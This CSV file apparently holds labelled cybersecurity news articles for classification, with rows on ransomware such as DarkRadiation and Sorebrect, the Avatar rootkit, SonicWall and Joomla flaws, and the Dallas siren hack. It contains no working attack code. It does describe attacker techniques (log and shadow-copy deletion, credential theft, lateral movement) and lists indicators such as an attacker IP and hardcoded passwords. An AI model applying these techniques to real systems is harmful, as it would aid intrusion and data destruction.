Title,Link,Article,Label
"FBI offering $100,000 reward for information on Most Wanted Cyber Criminals",https://thehackernews.com/2013/11/fbi-offering-100000-reward-for.html,"The US Federal Bureau of Investigation has added five new hackers to its Cyber most wanted list and is seeking information from the public regarding their whereabouts.
The men are wanted in connection with hacking and fraud crimes both within the US as well as internationally. Rewards ranging from up to $50,000 to $100,000 are being offered for information that leads to their arrest.
Two of them are Pakistani, Farnhan Arshad and Noor Aziz Uddin, who caused the damage of over $50 million after hacking business telephone systems between 2008 and 2012. Arshad and Uddin are part of an international criminal ring that the FBI believes extends into Pakistan, the Philippines, Saudi Arabia, Switzerland, Spain, Singapore, Italy, Malaysia, and other locations.
Syrian national Andrey Nabilevich Taame, wanted for his alleged role in Operation Ghost Click, a malware scheme that compromised more than four million computers in more than 100 countries between 2007 and October 2011; there were at least 500,000 victims in the United States alone.
Alexsey Belan, a Russian national, is wanted for alleged hacking of three US-based companies between 2012 and 2013.
Carlos Perez-Melara is wanted for his alleged involvement in manufacturing software that was used to intercept the private communications of hundreds of victims around September 2003. As part of the scheme, Perez-Melara ran a website offering customers a way to ""catch a cheating lover"" by sending ""spyware"" disguised as an electronic greeting card.
The rewards are being offered for each of the five fugitives, all of whom are believed to be living outside the U.S.
""The expansion of the Cyber's Most Wanted list is a reflection of the FBI's increased efforts in this area,"" FBI officials said in a statement.
",Malware
Critical infrastructure managing software vulnerable to Unauthorized access,https://thehackernews.com/2012/10/critical-infrastructure-managing.html,"Reid Wightman from security firm ioActive reported that there is an undocumented backdoor available in CoDeSys software that actually used to manage equipment in power plants, military environments, and nautical ships.
The bug allow malicious hackers to access sensitive systems without authorization, Ars said. The CoDeSys tool will grant a command shell to anyone who knows the proper command syntax and inner workings, leaving systems that are connected to the public Internet open to malicious tampering and There is absolutely no authentication needed to perform this privileged command, Reid mention.
This software has been used in industrial control systems sold by 261 different manufacturers. 3S-Smart Software Solutions designs CoDeSys and recently issued an advisory that recommends users set a password, but he is able to develop two exploit shells , one is codesys-shell.py (to get the CoDeSys command shell without authentication) and other , codesys-transfer.py (read or write files to the PLC without authentication) which works fine without authentication.
This is another big security vulnerabilities that threaten power plants and other critical infrastructure both in the United States and elsewhere in the world. Wightman said a simple search using the Shodan, showed 117 devices directly connected to the Internet.
Wightman said that additional vulnerability details about issue and exploit code that automates the hack can be added to Metasploit framework.
",Vulnerability
3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances,https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html,"SonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild.
Tracked as CVE-2021-20021 and CVE-2021-20022, the flaws were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's ES application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021.
FireEye is tracking the malicious activity under the moniker UNC2682.
""These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device,"" researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino said.
The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files, and emails, and move laterally into the victim organization's network.""
A brief summary of the three flaws are below -
CVE-2021-20021 (CVSS score: 9.4) - Allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host
CVE-2021-20022 (CVSS score: 6.7) - Allows a post-authenticated attacker to upload an arbitrary file to the remote host, and
CVE-2021-20023 (CVSS score: 6.7) - A directory traversal flaw that allows a post-authenticated attacker to read an arbitrary file on the remote host.
The administrative access not only enabled the attacker to exploit CVE-2021-20023 to read configuration files, counting those containing information about existing accounts as well as Active Directory credentials but also abuse CVE-2021-20022 to upload a ZIP archive containing a JSP-based web shell called BEHINDER that's capable of accepting encrypted command-and-control (C2) communications.
""With the addition of a web shell to the server, the adversary had unrestricted access to the command prompt, with the inherited permissions of the NT AUTHORITY\SYSTEM account,"" FireEye said, adding the attacker then used ""living off the land"" (LotL) techniques to harvest credentials, move laterally across the network, and even ""compress a subdirectory [that] contains daily archives of emails processed by SonicWall ES.""
In the incident observed by the firm, the threat actor is said to have escalated their attack by conducting an internal reconnaissance activity, albeit briefly, prior to being isolated and removed from the environment, thus foiling their mission. The true motive behind the intrusion remains unclear.
SonicWall users are recommended to upgrade to 10.0.9.6173 Hotfix for Windows and 10.0.9.6177 Hotfix for hardware and ESXi virtual appliances. The SonicWall Hosted Email Security product was automatically patched on April 19 and hence no additional action is required.
UPDATE
The Milpitas-headquartered network security firm labeled the findings as an outcome of routine collaboration with third-party researchers and forensic analysis firms to ensure its products adhere to the security best practices.
""Through the course of this process, SonicWall was made aware of and verified certain zero-day vulnerabilities — in at least one known case, being exploited in the wild — to its hosted and on-premises email security products,"" the company said in a statement to The Hacker News. ""SonicWall designed, tested and published patches to correct the issues and communicated these mitigations to customers and partners.""
",Cyber_Attack
How to Decrypt TeslaCrypt Ransomware Files Using Master Key,https://thehackernews.com/2016/05/decrypt-teslacrypt-ransomware.html,"Here's some good news for victims who are trying to unlock and remove TeslaCrypt ransomware.
Now, you can decrypt all your important files that have been encrypted by TeslaCrypt ransomware.
So, stop Googling about How to decrypt TeslaCrypt Ransomware encrypted files, as the malware authors themselves provided the solution to your problem.
Since its launch in March last year, TeslaCrypt computer virus has been used in massive malvertising attacks. The ransomware, which often targets PC gamers, locks up files until a ransom is paid, usually $500 in Bitcoin. Infection generally comes through corrupted websites, malvertising or phishing emails.
In a surprising move in the malware's story, the cybercriminals behind the nefarious TeslaCrypt ransomware have apparently shut down their operations and released a master key to the public that can unlock all encrypted files on PCs infected by the latest versions of TeslaCrypt.
The icing on the cake is that the universal decryption key is free, so victims can decrypt their files without paying a single penny.
Here's what one of the developers of TeslaCrypt posted on the TeslaCrypt Dark Website:
""Project closed! Master key for decrypt: 440A241DD80FCC5664E861989DB716E08CE627D8D40C7EA360AE855C727A49EE. Wait for other people make universal decrypt software. We are sorry!""
The above note was prompted by a query from an ESET security researcher, who had noticed the successive downfall of TeslaCrypt and asked the authors for a decryption key.
The authors offered a free master key in an entirely surprising move and ESET quickly created a Free Ransomware Decryptor tool for TeslaCrypt, which is available for download from the ESET website.
How to Use Master Ransomware Decryption Key
Using the master key, security researcher has created a decryptor tool that is available for download, with detailed instructions, from the ESET website.
Bleeping Computer has also released another TeslaCrypt ransomware decryptor tool, dubbed TeslaDecoder, with a much easy-to-use interface.
",Malware
"Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication",https://thehackernews.com/2013/05/mysterious-avatar-rootkit-with-api-sdk.html,"Early 2012 ESET company a mysterious malware, dubbed the Avatar rootkit (Win32/Rootkit.Avatar), advertised in the underground forums by Russian cyber crime.
""We present you here previously announced product. In connection with work on other projects, we moved the release date for the public from May to February 2013th 2012go.Now nuclear rootkit AVATAR is available for rental.""
Despite the malware was described months ago it was not found and published until now, in March ESET researchers detected two droppers with different C&C servers and having different compilation time stamps as showed in the following pictures:
The Avatar rootkit appears very sophisticated, it uses two different infection techniques, the first in the dropper so as to bypass detections by HIPS, and the second one in the rootkit driver to allow the malware to be alive after system reboot, the instance detected works only on x86 systems.
The 2 level dropper for Avatar rootkit works in conjunction, the first one implements LZMA decompression for the second level dropper. Driver module and second level dropper are unique in every instance of malware thanks to a random names generator names for mutexes/events in the first level dropper.
To the second level dropper is assigned the function of escalate privilege on target system, the dropper uses two different techniques, the exploitation of the MS11-080 vulnerability with code as a public exploit from Metasploit Framework with minor changes, and COM Elevation (UAC whitelist).
The following a diagram that shows the process implemented by dropper:
Most interesting part of the exploit code of Avatar rootkit is the steps taken after exploitation, kernel-mode shellcode is in fact executed to load malicious driver, the rootkit driver is not stored on the hard drive and loads only from a memory region.
The Avatar rootkit implements a technique for loading the driver by system driver infection that appeared very effective for bypassing victim's defense, and allows the loads other kernel-mode modules exploiting the malicious system driver.
The post reports:
""In order to perform its infection, Avatar randomly chooses a driver and checks its name against a blacklist that varies for every Windows versions."" ""The Avatar rootkit driver is able to infect several system drivers without changing the original driver's file size.""
Once loaded the Avatar rootkit driver, the malicious code executes an algorithm for infecting system drivers so as to survive after reboot, the malware is also able to detect the presence of a virtual machine environment thanks to a sophisticated technique that query BIOS to check for some specific strings related to principal machines available on the market such as VirtualBox and VMware.
The malware uses a hidden file system to store the user-mode payload module and also additional files, all the data are encrypted using a custom symmetric cipher. The hidden file storage is also used by Avatar rootkit to store additional user-mode and kernel-mode modules that malware can download and execute. Avatar rootkit doesn't store malicious modules in any standard NTFS storage, except for infected system drivers.
The principal functionality of the malware are:
command center communications
parsing configuration information
read/write into hidden file storage
communicating with the rootkit driver
installing additional user-mode and kernel-mode modules
The post highlight the flexibility of the malicious agent:
""Of course, this means the initial infection can be the starting point of a variety of malicious activities based on the modules that deployed. In our case the payload component avcmd.dll was injected into svchost.exe system process which started communicating with C&C IP addresses stored in the configuration file. ""
Another interesting feature implemented by authors of the rootkit in the protection of communications with the command center with a custom encryption algorithm which output is base64-encoded, Avatar rootkit has an additional way of communicating with the C&C server searching for messages in Yahoo groups using special parameters. The technique is not new and is very efficient to protect the malware over sinkhole attempts of security firms, because information about C&C's domains is encrypted using an RSA asymmetric algorithm.
On the use of Yahoo Groups as C&C the report states:
""The group description is encrypted with an RSA algorithm and a 1024-bit private key. It is possible to decrypt this data with the public key stored in the configuration file. We suppose this information is to be found in the encrypted message used for returning control for a botnet without an active C&C.""
But Avatar rootkit appears a very complex and articulated project, it is accompanied by a list of API for developing additional components based on the Avatar Runtime Library, a special SDK for developing additional user-mode components which allow communication with the Avatar rootkit driver.
Win32/Rootkit.Avatar is considerable a sophisticated rootkit family having many interesting features to avoid detection by security software, due this reason security experts believe that the agent has been developed for long term infection by the system executing the attack.
Avatar rootkit may hold many surprises in the next future.
",Vulnerability
New Virus Decides If Your Computer Good for Mining or Ransomware,https://thehackernews.com/2018/07/cryptocurrency-mining-ransomware.html,"Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations to decide which of the two schemes could be more profitable.
While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption key required to decrypt your files, cryptocurrency miners utilize infected system's CPU power to mine digital currencies.
Both ransomware and cryptocurrency mining-based attacks have been the top threats so far this year and share many similarities such as both are non-sophisticated attacks, carried out for money against non-targeted users, and involve digital currency.
However, since locking a computer for ransom doesn't always guarantee a payback in case victims have nothing essential to losing, in past months cybercriminals have shifted more towards fraudulent cryptocurrency mining as a method of extracting money using victims' computers.
Researchers at Russian security firm Kaspersky Labs have discovered a new variant of Rakhni ransomware family, which has now been upgraded to include cryptocurrency mining capability as well.
Written in Delphi programming language, the Rakhni malware is being spread using spear-phishing emails with an MS word file in the attachment, which if opened, prompts the victim to save the document and enable editing.
The document includes a PDF icon, which if clicked, launches a malicious executable on the victim's computer and immediately displays a fake error message box upon execution, tricking victims into thinking that a system file required to open the document is missing.
How Malware Decides What To Do
However, in the background, the malware then performs many anti-VM and anti-sandbox checks to decide if it could infect the system without being caught. If all conditions are met, the malware then performs more checks to decide the final infection payload, i.e., ransomware or miner.
1.) Installs Ransomware—if the target system has a 'Bitcoin' folder in the AppData section.
Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes that match a predefined list of popular applications and then displays a ransom note via a text file.
2.) Installs cryptocurrency miner—if 'Bitcoin' folder doesn't exist and the machine has more than two logical processors.
If the system gets infected with a cryptocurrency miner, it uses MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background.
Besides this, the malware uses CertMgr.exe utility to install fake root certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated in an attempt to disguise the miner as a trusted process.
3.) Activates worm component—if there's no 'Bitcoin' folder and just one logical processor.
This component helps the malware to copy itself to all the computers located in the local network using shared resources.
""For each computer listed in the file the Trojan checks if the folder Users is shared and, if so, the malware copies itself to the folder \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup of each accessible user,"" the researchers note.
Regardless of which infection is chosen, the malware performs a check if one of the listed antivirus processes is launched. If no AV process is found in the system, the malware will run several cmd commands in an attempt to disable Windows Defender.
What's more? There's A Spyware Feature As Well
""Another interesting fact is that the malware also has some spyware functionality – its messages include a list of running processes and an attachment with a screenshot,"" the researchers say.
This malware variant is targeting users primarily in Russia (95.5%), while a small number of infection has been noticed in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well.
The best way to prevent yourself from being a victim of such attacks in the first place is never to open suspicious files and links provided in an email. Also, always keep a good backup routine and updated anti-virus software in place.
",Malware
Wormable DarkRadiation Ransomware Targets Linux and Docker Instances,https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html,"Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called ""DarkRadiation"" that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.
""The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,"" researchers from Trend Micro said in a report published last week. ""The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s).""
As of writing, there's no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.
The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor's infrastructure (IP address ""185.141.25.168"") in a directory called ""api_attack."" The toolset was first noticed by Twitter user @r3dbU7z on May 28.
DarkRadiation's infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.
Encryption Process
Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called ""node-bash-obfuscate"" to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references.
Upon execution, DarkRadiation checks if it's run as the root user, and if so, uses the elevated permissions to download and install Wget, cURL, and OpenSSL libraries, and takes a periodic snapshot of the users that are currently logged into a Unix computer system using the ""who"" command every five seconds, the results of which are then exfiltrated to an attacker-controlled server using the Telegram API.
""If any of these [libraries] are not available on the infected device, the malware attempts to download the required tools using YUM (Yellowdog Updater, Modified), a python-based package manager widely adopted by popular Linux distros such as RedHat and CentOS,"" SentinelOne researchers explained in a parallel write-up of DarkRadiation published Monday.
The ransomware, in its final phase of the infection, retrieves a list of all available users on the compromised system, overwrites existing user passwords with ""megapassword,"" and deletes all shell users, but not before creating a new user with the username ""ferrum"" and password ""MegPw0rD3"" to proceed with the encryption process.
Worm-like Spreading Functionality
Interestingly, SentinelOne's analysis reveals different variations wherein the password for the user ""ferrum"" is downloaded from the attacker's C2 server in few versions, while in others, it is hardcoded with strings such as ""$MeGaPass123#,"" implying that the malware is undergoing rapid changes prior to actual deployment.
""It must be noted that the ransomware appends radioactive symbols ('.☢') as a file extension for an encrypted file,"" Trend Micro threat researcher Aliakbar Zahravi said.
A second moving part associated with the attack is an SSH worm that's engineered to receive a credential configuration in the form of a base64-encoded parameter. Subsequently, this encoded argument is used to connect to the target system using the SSH protocol, and eventually download and execute the ransomware.
In addition to reporting the execution status, along with the encryption key, back to the adversary's Telegram channel through the API, DarkRadiation also comes with capabilities to stop and disable all running Docker containers on the infected machine, after which a ransom note is displayed to the user.
""Malware written in shell script languages allows attackers to be more versatile and to avoid some common detection methods,"" SentinelOne researchers said.
""As scripts do not need to be recompiled, they can be iterated upon more rapidly. Moreover, since some security software relies on static file signatures, these can easily be evaded through rapid iteration and the use of simple obfuscator tools to generate completely different script files.""
",Malware
New Fileless Ransomware with Code Injection Ability Detected in the Wild,https://thehackernews.com/2017/06/fileless-ransomware-code-injection.html,"It is no secret that hackers and cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that come with limitless attack vectors with low detection rates.
Security researchers have recently discovered a new fileless ransomware, dubbed ""Sorebrect,"" which injects malicious code into a legitimate system process (svchost.exe) on a targeted system and then self-destruct itself in order to evade detection.
Unlike traditional ransomware, Sorebrect has been designed to target enterprise's servers and endpoint. The injected code then initiates the file encryption process on the local machine and connected network shares.
This fileless ransomware first compromises administrator credentials by brute forcing or some other means and then uses Microsoft's Sysinternals PsExec command-line utility to encrypt files.
""PsExec can enable attackers to run remotely executed commands, instead of providing and using an entire interactive login session, or manually transferring the malware into a remote machine, like in RDPs,"" Trend Micro says.
Sorebrect Also Encrypts Network Shares
Sorebrect also scans the local network for other connected computers with open shares and locks files available on them as well.
""If the share has been set up such that anyone connected to it has read-and-write access to it, the share will also be encrypted,"" researchers say.
The nasty ransomware then deletes all event logs (using wevtutil.exe) and shadow copies (using vssadmin) on the infected machine that could provide forensic evidence such as files executed on the system and their timestamps, which makes this threat hard-to-detect.
In addition, Sorebrect uses the Tor network protocol in an attempt to anonymize its communication with its command-and-control (C&C) server, just like almost every other malware.
Sorebrect Ransomware Spreads Worldwide
The Sorebrect fileless ransomware has been designed to target systems from various industries including manufacturing, technology, and telecommunications.
According to Trend Micro, Sorebrect was initially targeting Middle Eastern countries like Kuwait and Lebanon, but from last month, this threat has started infecting people in Canada, China, Croatia, Italy, Japan, Mexico, Russia, Taiwan, and the U.S.
""Given ransomware's potential impact and profitability, it wouldn't be a surprise if SOREBRECT turns up in other parts of the world, or even in the cybercriminal underground where it can be peddled as a service,"" the researchers note.
This is not the first time when researchers have come across Fileless malware. Two months ago, Talos researchers discovered a DNSMessenger attack that was completely Fileless and used DNS TXT messaging capabilities to compromise systems.
In February, Kaspersky researchers also discovered fileless malware that resided solely in the memory of the compromised computers, which was found targeting banks, telecommunication companies, and government organizations in 40 countries.
Ways to Protect Against Ransomware Attacks
Since the ransomware does not target individuals but organizations, sysadmins and information security professionals can protect themselves by:
Restricting user write permissions: a significant factor that exposes network shares to ransomware by giving users full permissions.
Limiting privilege for PsExec: Limit PsExec and provide permission to run them only to system administrators.
Keeping your system and network up-to-date: Always keep your operating system, software, and other applications updated.
Backing up your data regularly: To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC.
Adopting a cyber security-aware workforce: Educating your employees about malware, threat vectors and security measure always plays a major role in any organization.
",Malware
Joomla 3.4.5 patches Critical SQL Injection Vulnerability,https://thehackernews.com/2015/10/joomla-security.html,"Joomla – one of the most popular open source Content Management System (CMS) software packages, has reportedly patched three critical vulnerabilities in its software.
The flaws, exist in the Joomla version 3.2 to 3.4.4, include SQL injection vulnerabilities that could allow hackers to take admin privileges on most customer websites.
The patch was an upgrade to Joomla version 3.4.5 and only contained security fixes.
The vulnerability, discovered by Trustwave SpiderLabs researcher Asaf Orpani and Netanel Rubin of PerimeterX, could be exploited to attack a website with SQL injections.
SQL injection (SQLi) is an injection attack wherein a bad actor can inject/insert malicious SQL commands/query (malicious payloads) through the input data from the client to the application.
The vulnerability is one of the oldest, most powerful and most dangerous flaw that could affect any website or web application that uses an SQL-based database.
The recent SQLi in Joomla discovered by Orpani are:
CVE-2015-7297
CVE-2015-7857
CVE-2015-7858
CVE-2015-7857 enables an unauthorized remote attacker to gain administrator privileges by hijacking the admin session. Once exploited, the attacker may gain full control of the website and execute additional attacks.
The vulnerability discovered in a core module that doesn't require any extensions, therefore, all the websites that use Joomla versions 3.2 (released in November 2013) and above are vulnerable.
Researchers also discovered the related vulnerabilities, CVE-2015-7858 and CVE-2015-7297, as part of their research.
Actually the Joomla code resided in /administrator /components /com_contenthistory/ models/history.php was vulnerable to SQL injection.
Orpani came across many weak links in this code, that could:
Exploit the vulnerability to gain the administrator session key
On executing the request on Joomla site returns the admin session key
Using the admin key to hijack the session and further gaining:
Access to the /administrator/ folder
Administrator privileges
Access to the administrator Control Panel
Vulnerability in DRUPAL
The popular CMS Drupal has also patched an Open Redirect vulnerability in the Overlay module in its Core project (7.x versions prior to 7.41).
The Overlay module in Drupal core project displays administrative pages as a layer on the current page, rather than replacing the page in the browser window.
However, the module doesn't sufficiently validate URLs prior to displaying their contents, which leads to an open redirect vulnerability, according to Drupal's official blog.
The vulnerability affected the site users with administrative rights; i.e. if only the ""Access the administrative overlay"" permission is enabled the vulnerability could be exploited.
The fix for the open redirect vulnerability was released and required the sites to upgrade to Drupal version 7.41.
If you were not aware of these vulnerabilities, do not panic you can patch your CMS now!
",Vulnerability
World War C report - Motives behind State Sponsored Cyber Attacks,https://thehackernews.com/2013/10/world-war-c-report-motives-behind-state_3.html,"Nation-state driven cyber attacks are routinely conducted on a global scale to defend national sovereignty and project national power. We are living in the cyber era, human conflict is involving also the fifth domain of warfare, the cyberspace. As never before disputes take place with blows of bits, militias of every government are developing cyber capabilities dedicating great effort for the establishment of cyber units.
Network security company, FireEye, has released a report titled ""World War C: Understanding Nation-State Motives Behind Today's Advanced Cyber Attacks"" which describes the effort spent by governments in cyber warfare context, the document analyzes in detail the different approaches adopted by various countries in conducting nation-state driven cyber attacks.
Security experts highlight the intensification of state-sponsored attacks for both cyber espionage and sabotage purpose, campaigns such as Moonlight Maze and Titan Rain or the destructive cyber strikes on Iran and Georgia have signed the evolution of the military doctrine.
""Cyberspace has become a full-blown war zone as governments across the globe clash for digital supremacy in a new, mostly invisible theater of operations. Once limited to opportunistic criminals, cyber attacks are becoming a key weapon for governments seeking to defend national sovereignty and project national power.""
In the arsenal of government militias are entering strongly DDoS tools, spyware and computer viruses, nation-state driven cyber attacks are considerable an optimal option by governments for the following reasons:
Reduced costs compared to conventional strikes.
Efficiency
The asymmetric nature of the cyber attacks makes difficult the defense.
The anonymous nature of the offense allows the attacking government to circumvent the approval by the world community to a military offensive.
Possibility to conduct cyber attacks in peacetime for immediate geopolitical ends, as well as to prepare for possible future kinetic attacks.
As explained in the study the attribution of responsibility for a cyber attack is a very hard task, FireEye experts correctly highlighted that to uncover the perpetrators is necessary to apply a multi layered approach based on forensic ""reverse-hacking"" techniques, build a deep knowledge of ""patterns"" of attack, evaluate the geopolitical context of cyber attacks aims associated to specific government.
""A cyber attack, viewed outside of its geopolitical context, allows very little legal maneuvering room for the defending state,"" ""False flag operations and the very nature of the internet makes tactical attribution a losing game. However, strategic attribution – fusing all sources of intelligence on a potential threat – allows a much higher level of confidence and more options for the decision maker,"" ""And strategic attribution begins and ends with geopolitical analysis."" said Professor Thomas Wingfield of the Marshall Centre, a joint US-German defense studies institute.
""The biggest challenge to deterring, defending against, or retaliating for cyber attacks is the problem of correctly identifying the perpetrator,"" said Prof. John Arquilla, Naval Postgraduate School ""Attribution"" for a nation-state driven cyber attack is difficult due to similarity with the methods adopted by single individuals, organizations, or state-sponsored hackers. States are often mistakenly identified as non-state entities, and vice versa.
Another dangerous phenomenon that we are assisting is the growth of number of cyber mercenary groups close to governments that are structured as cyber criminal gangs but that are able to offer hacking services to involve in nation-state driven cyber attacks.
""Cybercrime organizations offer anyone, including governments, cyber attack services to include denial-of-service attacks and access to previously compromised networks."" states the World War C report.
FireEye experts analyzed the Nation-state driven cyber attacks identifying the tactics and characteristics for the offensive in various regions:
Asia-Pacific: home to large, bureaucratic hacker groups, such as the ""Comment Crew"" who pursues targets in high-frequency, brute-force attacks.
Russia/Eastern Europe: More technically advanced cyber attacks that are often highly effective in evading detection.
Middle East: Cybercriminals in the region often using creativity, deception, and social engineering to trick users into compromising their own computers.
United States: origin of the most complex, targeted, and rigorously engineered cyber attack campaigns to date, such as the Stuxnet worm. Attackers favor a drone-like approach to malware delivery.
New players are entering the arena of cyber warfare strongly, countries such a North Korea, Iran and Syria have demonstrated to represent a serious menace also for the most industrialized superpower, this is the democracy of the new military doctrine. Examining most advanced countries in cyber warfare, China is considered responsible for the largest number of Nation-state driven cyber attacks, it uses high-volume noisly cyber attacks mainly for cyber espionage.
On the other end U.S., and Israel, providing the most advanced technologies, are able to conduct more sophisticated and surgical cyber operations, Stuxnet and Duqu are just a couple of examples of products of joint effort spent by the two governments. The Russian Government is considered one of the entities with major cyber capabilities, like Israel and US it is able to perform sophisticated nation-state driven cyber attacks, but little is known about the internal organization of its cyber units. According to rumors, a group of hackers that report directly to the President is the core of Russian cyber command that has operated in a stately way in cyberspace against hostile governments and on the domestic front against opponents of the regime.
""Though relatively quiet, Russia appears to be home to many of the most complex and advanced cyber attacks FireEye researchers have seen. More specifically, Russian exploit code can be significantly stealthier than its Chinese counterpart—which can also make it more worrisome. The ""Red October"" campaign, including its satellite software dubbed ""Sputnik,"" is a prominent example of likely Russian malware."" states the report.
FireEye's World War C ends proposing a list of factors that could influence the cyber security landscape in the medium term:
Outage of national critical infrastructure - we have still not assisted to cyber attacks that have compromised a national infrastructures like a power grid, but that day may not be far.
Cyber arms treaty - we are already assisting with the cyber army race for the above reasons, governments will continue to invest to increase their cyber capabilities. Following the table reporting the investment in cyber capabilities I presented to the Cyber Threat Summit 2012, let's consider that that the expense has grown despite the cuts in most cases.
PRISM, freedom of speech, and privacy - Disclosure of PRISM and other US surveillance activities will further complicate the delicate scenarios. The debate on topics such as freedom of speech and privacy could bring some ""annoyance"" to the intelligence activities conducted by the various governments, and nothing else in my judgment. No mistake, privacy and technology are like two separated spouses that live in the same house.
New actors on the cyber stage - cyberspace is a crowded place, Iran, Syria, North Korea, and even non state actors such as Anonymous have employed cyber attacks as a way to conduct diplomacy and wage war by other means. FireEye researchers wager of growing cyber capabilities of Poland, Brazil and Taiwan.
Stronger focus on evasion - due to the evolution of cyber defense attackers may be improve the offense with sophisticated techniques to avoid detection and fly under the radar.
Information warfare is ongoing ...
",Cyber_Attack
Hacker Caused Panic in Dallas by Turning ON Every Emergency Siren at Once,https://thehackernews.com/2017/04/dallas-tornado-siren-hack.html,"We have seen hackers flooding 911 emergency service with rogue requests to knock the service offline for an entire state, but some hacking incidents are worse than others.
One such incident took place in Dallas on Friday night when hacker triggered a network of 156 emergency warning sirens for about two hours, waking up residents and sparking fears of a disaster.
The emergency warning sirens — designed to warn citizens of the Texas about dangerous weather conditions, such as severe storms and tornados — were activated around 11:40 p.m. Friday and lasted until 1:20 a.m. Saturday.
The city officials tried to inform residents not to call 911 as there was not any emergency situation in the city, but the 911 system was nevertheless flooded with over 4,400 calls from panicked residents.
Rocky Vaz, director of Dallas Office of Emergency Management (OEM), told the Dallas Morning News that the alarms blasted about 15 times for 90-second durations. You can even watch video footage of the incident posted by some people on the social media.
Ever wonder what the end of the world feels like? #dallas #sirens pic.twitter.com/dvokKWkZ6N
— ManicPixieDreamGay (@deadlyblonde) April 8, 2017
The OEM technicians were eventually able to shut down the warning system and are working to keep this from happening again by implementing ""more safeguards.""
The city officials said the sirens were set off by a hacker who compromised the Dallas city's emergency alert system, but they did not disclose how the system was compromised or who may be responsible for the attack.
""We can state at this time that the City's siren system was hacked Friday night,"" the Dallas Public Information Office confirmed on Saturday. ""For security reasons, we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area.""
The officials have notified the Federal Communications Commission (FCC) for assistance in identifying the exact source of the hack.
This is the second time when some hacker has attacked critical infrastructure in the city. Last year, some unknown hacker hacked into some traffic signals in Dallas and used them to publish jokes.
Dallas Mayor Mike Rawlings noted on his Facebook page that the incident is yet ""another serious example of the need for us to upgrade and better safeguard our city's technology infrastructure,"" adding that they're working on identifying and prosecuting those responsible for the attack.
",Cyber_Attack
DPScan : Drupal Security Scanner Released,https://thehackernews.com/2012/02/dpscan-drupal-security-scanner-released.html,"DPScan : Drupal Security Scanner Released
The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines.
This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster, Here is a little demonstration. After downloading the script (in python), you simply type:
> python DPScan.py [website url]
You can download Drupal Security Scanner here.
",Vulnerability
New Mac malware opens secure connection for a remote hacker,https://thehackernews.com/2013/02/new-mac-malware-opens-secure-connection.html,"A new malware threat for the Mac has been discovered that attempting to set up a secure connection for a remote hacker to connect through and grab private information.
Dubbed ""Pintsized"" that uses a modified version of OpenSSH to potentially set up a remote connection into Mac accounts.
This backdoor Trojan can be used to conduct distributed denial of service (DDoS) attacks, or it can be used to install additional Trojans or other forms of malicious software.
Since the connection between the hacker and the machine is encrypted, it becomes very hard for the Trojan to be detected or traced. The threat has the potential to become serious, as it uses an exploit in OS X to bypass Gatekeeper and establish a reverse shell that creates a secure connection.
Trojan stays hidden by disguising itself as a file that is used for networked printers in Mac OS X. The location of the malware has been traced to this particular directory. This tactic conceals the Trojan and makes a monitor think that a printer is seeking access to the network.
Pintsized hasn't been seen in the wild yet, according to security software maker Intego, since the malware looks to still be in a proof of concept stage.
",Malware
FBI is Investigating Theft of $1.3 Million in Bitcoin from a Massachusetts Man,https://thehackernews.com/2016/10/bitcoin-hacked.html,"Over two months ago, the world's third largest Bitcoin Exchange Bitfinex lost around $72 Million worth of Bitcoins in a major hack.
Shortly after the company encountered a $72,000,000 Bitcoin theft, an unnamed Bitfinex user from Cambridge, Massachusetts, filed a police report in September, alleging that $1.3 Million of funds were stolen from his account.
Since then the Cambridge police have handed the case over to the FBI, which is working with the Bitcoin exchange as well as European authorities to recover funds stolen from the Bitfinex user, Coindesk reports.
The individual claimed that he held $3.4 Million in Bitcoin in his personal wallet hosted by the Bitfinex Bitcoin exchange. But following the August's Bitfinex breach, he was left with $2.1 Million in his account.
Bitfinex then notified the individual of his initial loss of approximately $1.3 Million in Bitcoin, but after the company issued IOU tokens as an emergency measure to keep the exchange operating, the loss incurred was reduced to just $720,000.
The IOUs or BFX tokens are a form of compensation provided to the victims to reduce their losses by a significant factor.
Although specific details remain still unclear, the Bitfinex user confirmed lose of funds beyond Bitfinex IOU tokens issued to all the victims of the breach.
